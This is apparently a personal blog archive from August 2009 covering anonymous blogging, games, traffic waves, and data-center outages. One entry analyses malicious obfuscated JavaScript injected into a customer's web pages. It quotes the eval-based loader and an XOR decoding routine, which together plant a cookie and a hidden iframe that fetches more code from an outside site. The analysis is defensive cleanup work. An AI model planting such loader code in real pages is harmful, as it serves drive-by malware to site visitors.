Saturday, August 22, 2009
If Corsair can break his hiatus, so can I
Sometimes I think about having a public journal, like Spring or Sean. In fact, Sean just asked me today if he could reference my journal in his using my real name.
Sean, after reading this article, the answer is a resounding no. I'll take my chances and try to remain anonymous.
The article in question is your standard anonymous blogger comes out and gets fired story. I don't begrudge Corsair for wanting to remain anonymous as we as a society attempt to figure out new social norms when suddenly everybody has a global soapbox.
Heck, I found out the hard way that information tends to find its way to the very people you don't want it to reach (back in college, I wrote a rather scathing humor column about my high school English teachers, and of course it got back to them—sigh). [And it wasn't all that funny either. —Editor][Thanks. — Sean][No problem. —Editor]
The approach I take towards blogging (or journaling, or whatever you want to call this) is to keep the private stuff private (much like what happens in Vegas, stays in Vegas, and that's all I'll say about that trip to Las Vegas, or any other trip I've taken to Las Vegas), along with stuff that happens to friends (it's their story to tell, not mine).
Work—well, when I worked at Negiyo (which isn't the real name of the company, and yet, nine years after working there I still won't call it by its real name) I didn't say anything bad about the company, nor what I really did (which wasn't much different than Tom Smykowski's job when you get right down to it) and I never mentioned names of any fellow cow-orkers.
Now I tend to write more about my job, but mostly it's notes to myself, and a way of letting off steam. I've yet to name the company I work for now (here it's known as The Company), and I haven't named my fellow cow-orkers. I never mention customer names and when I do mention projects, I give them different code names than the ones we use at The Company.
It also doesn't hurt that Smirk, who not only owns The Company, but signs the checks I cash, gets on my case when I don't post often enough. (See! I'm blogging! I'm blogging!) But I realize that not every blogger has that luxury. In fact, of all the people I do know in Real Life who also blog (or keep online journals), I think I'm the only one who even mentions work.
Don't worry Corsair, I won't reveal your true name to anyone.
I would call it “Squid Eyeballs” myself …
(Kevin and Kell comic via Websnark)
I'm telling you people, start with the California rolls and next thing you know, squid eyeballs!
No one believes me though.
Sunday, August 23, 2009
Now all I need is a spacesuit …
I spent pretty much the entire day reading Atomic Rocketships of the Space Patrol (otherwise known as “So You Wanna Build A Rocket?”) and it was time well spent. Just about everything you ever wanted to know about rocket and spaceship design, from staffing (crewing?) to space warfare to holding on to the reigns of a galactic empire. There's even a section on futuristic games, a bunch of which I would love to try (any Trekkers for Fizzbin?).
Paradice
The one future game I read about that really leapt out at me just for the sheer beauty of the board and pieces was Paradice.
It's a very beautiful game to look at—almost a work of art.
Paradice is interactive art, a game of give and take. Players explore decisions made in response to changing circumstances and engage with the contradictions of competing needs.
Oh, well, I guess it is art. Hard to come by, and the only version that seems to be available these days is not the above resin board (which at first I thought was glass) but a wooden version which just doesn't look as good (and while cheaper, is still about $50).
The game play—eh, but I haven't played it. I did read the rules though, and the design behind the game play is unique, such that only one side can win (it's in the rules) but there's a one in six chance each turn that the players swap sides, and in a certain circumstance the game starts over (and the players switch sides).
As an art piece, it's a statement about the dichotomy of man's desire to consume (one player) vs. that of preserving the environment and becoming one with nature (the other player), which is why I'm pretty much “eh” on the game play (it's not that I don't believe in nature conservation, but the game is so one sided—it's the “being one with nature” side that can win, that the moralistic viewpoint of the game design is being forced down my throat—that I find the game play off-putting).
But man, it certainly is a beautiful looking game …
Monday, August 24, 2009
“Frühling für Hitler”
I really don't know what to make of this. It's odd enough that a Jewish man would write a musical number called “Springtime For Hitler (okay, it was for a comedy film) but that doesn't even come close to the cognitive dissonance of seeing it on German television (link via news from me).
Words are failing me.
Tuesday, August 25, 2009
Traffic jams just happen
I've been aware of “traffic waves” for several years now and the animated graphics on the site do illustrate the issue, but now it seems that Japanese researches have actually created “traffic waves” on a closed course:
Researchers from several Japanese universities managed the feat by putting 22 vehicles on a 230-metre single-lane circuit (see video).
They asked drivers to cruise steadily at 30 kilometres per hour, and at first the traffic moved freely. But small fluctuations soon appeared in distances between cars, breaking down the free flow, until finally a cluster of several vehicles was forced to stop completely for a moment.
That cluster spread backwards through the traffic like a shockwave. Every time a vehicle at the front of the cluster was able to escape at up to 40 km/h, another vehicle joined the back of the jam.
The shockwave jam travelled backwards through the ring of vehicles at roughly 20 km/h, which is the same as the speed of the shockwave jams observed on roads in real life, says lead researcher Yuki Sugiyama, a physicist in the department of complex systems at Nagoya University.
Via Hacker News, Shockwave traffic jam recreated for first time - tech - 04 March 2008 - New Scientist
The video of the “traffic waves” (called “shockwave traffice jams” in the video) is fascinating to watch as the “traffic wave” just kind of happens.
Thursday, August 27, 2009
Deutsch volk und westlich Musik (med några svenska rap musik)
I'm beginning to wonder about the Germans—first it's “Springtime For Hitler” on German television, and now it's Germans doing a country-western cover of the funk R&B song Word Up (link via kisrael.com).
I don't know why, but I'm finding I like American country-western music when done by non-Americans. Okay, maybe like is too strong a word—maybe tolerate would be better. It's the finding of something so unexpected, like a plane crashing into a derailing train during an earthquake just before a gas pipe explosion, only in a good way. It's the cognitive dissonance of watching The BossHoss (the German country-western group) covering a hip hop song originally done by a white guy in a musical form originally from the African American communities.
In fact, this fascination with American musical culture interpreted by non-Americans extends even further, to Swedish rap (I blame Wlofie for bringing this to my attention—not that there's anything wrong with Swedish rap—it just find it … oh … I don't know … amusing, much like Wlofie finds our attempt at Swedish meatballs amusing).
Saturday, August 29, 2009
My boss is no longer allowed to take vacations
Let me say this up front: Smirk is no longer allowed to take vacations, work related or otherwise.
Early this morning (around 5:00 am) I had to deal with a downed machine in The Data Center In Charlotte. That involved calling said Data Center (long distance, because there was an issue with their 800 number) and walk a technician through running fsck
on a corrupted file system.
Then this evening (around 5:00 pm) I had to deal with a downed data center in The Data Center in Boca Raton (yes, that sounds silly, but if customers who get their Internet connection through our Data Center In Boca Raton can't get out to the Internet, and when we can't get in to The Data Center In Boca Raton from the Internet, then we have to assume the worst—that al-Qaeda took out the site from orbit, just to make sure). This involved several frantic calls between Smirk, R (a customer and partner of ours) and Dan the Network Engineer, and a five minute drive through a thunderstorm (I wasn't worried about being struck because, as everybody knows, being struck by lightning, along with getting bit by a radioactive spider, being caught in a gamma radiation blast, or getting washed with nuclear waste, confers superhero abilities in a person) to find a rather confused UPS on battery mode (with full battery power) but not supplying power to the devices plugged into it (go figure).
The last time bad things like this happened, Smirk and I were on a business trip, and the only common element between the two times—Smirk was out of town.
Oh wait … that was in August as well.
Hmm … perhaps August should be cancelled.
Nah, Smirk is not allowed to take vacations.
Sunday, August 30, 2009
Down the rabbit hole
So far, three for three. A downed server, a downed data center and now several hacked sites, all on the same server.
I swear, Smirk is never going on vacation again.
Anyway, the following ticket comes in:
Subject: URGENT - XXXXXXXXXXXXXXX - VIRUS alert
Hello support,
When trying to access the site it gives a virus alert and Norton would not let me download the files to clean them.
Are you able to do the cleaning, it seems as it is since December 2008, when the sever was upgraded, it is very strange. I you are able to help cleaning the files, or any other way that you can suggest for the cleaning of them would be very helpful …
Thanks a lot,
XXXXXX
(English is not XXXXXX's first language)
I check the site with no problem, but then again, I'm using Linux and Mac OS X and therefore, I don't use Norton (or any virus checking software) so I'm not going to see an issue. I borrow Bunny's laptop (which does run Windows and has anti-viral software on it) and yes, there's something odd with the site. It refuses to come up, and I can't ping the address the site is on. I can ping the address above and the address below, but not the address the site is on. And the anti-virual software is not saying anything.
Thanks to some help from Gregory, I'm able to see that yes, indeed, the anti-viral software on Bunny's machine caught something and is refusing to load the site. At least now I have somewhere to look. And I don't have to look very far.
At the bottom of the index.html
file is:
<div id='x0499fd3b522511d0bf02ea0f9d3f27f9e'> <script> var jQuery = eval('wPi[n2d[o[w5.5e2v[aflP'.replace(/[\[P5f2]/g, '')); jQuery('\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x79\x61...
All on a single line (not broken up like it is here) for about 20K of obfuscated code. And it exists on every HTML and PHP page on not only the site in question, but two other sites as well (it's on a machine dedicated to the one customer and there are about six sites on the server).
There ended up being too many files to clean up by hand, so a bit of coding later, and I have a program to do the cleanup work. And then the fun begins …
The first statement of the malicious code in question ends up being:
var jQuery = eval('window.eval','');
That was easy enough. The next line required some code to decode the sludge of hex numbers into characters. Again, quickly write some code and I end up with:
function yaqD5(jx1h7){function oNLAq(aui){var s429=0;var fyLx=aui.length;var sLc 8=0;while(sLc8<fyLx){s429+=xjv3(aui,sLc8)*fyLx;sLc8++;}return (s429+'');}functio n xjv3(vMAgS,iEI4P){return vMAgS.charCodeAt(iEI4P);} try {var xhFV=eval('a5rMg 5u}m5eMn}t}s5.5cMaQl5lQe>e>'.replace(/[5\}M\>Q]/g, '')),oZAH='';var hDe=0,wTrzNs d=0,zfx0eN=(new String(xhFV)).replace(/[^@a-z0-9A-Z_.,-]/g,'');var bkTnW7=oNLAq( zfx0eN);jx1h7=unescape(jx1h7);for(var sFme6r=0; sFme6r < (jx1h7.length); sFme6r+ +){var ynhg=xjv3(zfx0eN,hDe)^xjv3(bkTnW7,wTrzNsd);var wUJNWv=xjv3(jx1h7,sFme6r); hDe++;wTrzNsd++;if(wTrzNsd>bkTnW7.length)wTrzNsd=0;if(hDe>zfx0eN.length)hDe=0;oZ AH+=String.fromCharCode(wUJNWv^ynhg) + '';}eval(oZAH); return oZAH=new String(); }catch(e){}}yaqD5('%32%38%35%37%36%33%35%30%59%27%1e%37%53%2a%31%47%0b%7f%15%65% 72%2f%3f%61%2e%09%29%2d%02%0e%05%04%0e%1d%68%11%32%24%75%6a%7b%7a%33%34%52%69%61 %02%2c%38%29%37%77%09%19%37%3f%26%64%62%33%21%12%18%3e%6f%63%29%7c%70%3b%00%35%3 2%2...
Yet more encoded data, about 4K worth this time. Quick program to decode this sequence of hexadecimal sludge and I get:
28576350Y'7S*1G er/?a. )-h2$uj{z34Ria,8)7w 7?&db3!>oc)|p;nR.}2;l.'ij.3
Obviously the cryptic JavaScript code does some additional massaging on that data. So I clean up the JavaScript code a bit:
function yaqD5(jx1h7) { function oNLAq(aui) { var s429=0; var fyLx=aui.length; var sLc8=0; while(sLc8<fyLx) { s429 += xjv3(aui,sLc8)*fyLx; sLc8++; } return (s429+''); } function xjv3(vMAgS,iEI4P) { return vMAgS.charCodeAt(iEI4P); } try { var xhFV=eval('a5rMg5u}m5eMn}t}s5.5cMaQl5lQe>e>'.replace(/[5\}M\>Q]/g, '')),oZAH=''; var hDe=0,wTrzNsd=0,zfx0eN=(new String(xhFV)).replace(/[^@a-z0-9A-Z_.,-]/g,''); var bkTnW7=oNLAq(zfx0eN); jx1h7=unescape(jx1h7); for(var sFme6r=0; sFme6r < (jx1h7.length); sFme6r++) { var ynhg=xjv3(zfx0eN,hDe)^xjv3(bkTnW7,wTrzNsd); var wUJNWv=xjv3(jx1h7,sFme6r); hDe++; wTrzNsd++; if(wTrzNsd>bkTnW7.length) wTrzNsd=0; if(hDe>zfx0eN.length) hDe=0; oZAH+=String.fromCharCode(wUJNWv^ynhg) + ''; } eval(oZAH); return oZAH=new String(); } catch(e){} } yaqD5('%32%38%35 ... [some 4,000 characters later ] ... %31%32');
Okay, it converts the hexadecimal sludge to binary data, then does something to it and finally evaluates the resulting data as JavaScript. I rewrite this a bit so that instead of evaluating the resulting string it prints the results out and I get:
f{lcvmhl tYDQt~DQHA&+{ sUFQxxCQLF,pravov}wg =.ycmklkeN ...
That certainly doesn't look like valid JavaScript to me. Okay, let's clean up some of the code a bit more (and only showing the relevant bits):
xhFV = eval('arguments.callee','') zfx0eN=(new String(xhFV)).replace(/[^@a-z0-9A-Z_.,-]/g,'')
From single stepping this (Firebug is great for this type of thing)
it appears that arguments.callee
returns the actual function,
with parameters, being called, and placed into xhFV
, and then
zfx0eN
is the source code of the function being called (in this
case, yadD5()
), but the source code is the actual string
representation as it appears in the HTML file! And this string was being used to
transform the binary sludge into JavaScript.
So no wonder I was getting garbage, because I changed the source code!
Sheesh.
Once I use the actual source code as the “decryption key” I
finally reach the bottom of this particular rabbit hole. The
code (which still has code like
s='<Eh]t;mElu>;<]b]o]dEy]>]'.replace(/[;\]rEu]/g,
'')
but that's about it) sets a cookie, then makes an invisible
IFRAME
which pulls a page (from a non-working site) that
presumedly contains even nastier code yet.
I wasn't fond of dynamic languages before tonight's little trip, and
afterwards, I like them even less. I'm fully aware that I might be
overreacting here, wanting to toss out eval()
with the
JavaScript bathwater, but I seriously can't see what benefit
comes with allowing unrestricted use of eval()
in browser-based
JavaScript engines.
Perhaps someone can enlighten me.
Monday, August 31, 2009
If this keeps up, I may have to physically drag Smirk back to the office
Four for four. Today's issue was a non-responsive DNS resolver in The Data Center In Boca Raton. It may have been left over from the UPS incident the other day (we have redundant DNS resolvers and there's a known issue with the monitoring system triggering false reports on that one resolver).
But still … this is getting ridiculous.
“What if you mix the mayonnaise in the can, WITH the tunafish? Or … hold it! Chuck! I got it! Take LIVE tuna fish, and FEED 'em mayonnaise! Oh this is great.”
Those USP devices you buy for your computer usually have a gel-cell battery that lasts for a few years. Less if your power goes out a lot. When you replace them, you pay a bundle, even if it's a standard cell. This short Instructable will demonstrate how to rework an older USP for more capacity with cheaper battery power.
Via Hacker News, Rework a USP with Massive Capacity
Sounds like a neat idea, but it got me thinking—wouldn't it be better if the USP could power the computer directly with DC? Our Cisco switches can take a direct 12V power supply, and pretty much all computer power supplies convert AC 120V to ±12V and ±5V (or is it ±3.3V these days?—I haven't kept up) and there are any number of devices (like the wireless router, the DSL modem, the VoIP phone) that all have these huge wall worts that are hard to find space to plug in that all work off of 12V as well. I would think it would be a no-brainer to make a USP do the conversion work and feed the devices DC directly, instead of converting 12VDC power into 120VAC power only to have it converted back to 12V/5VDC power.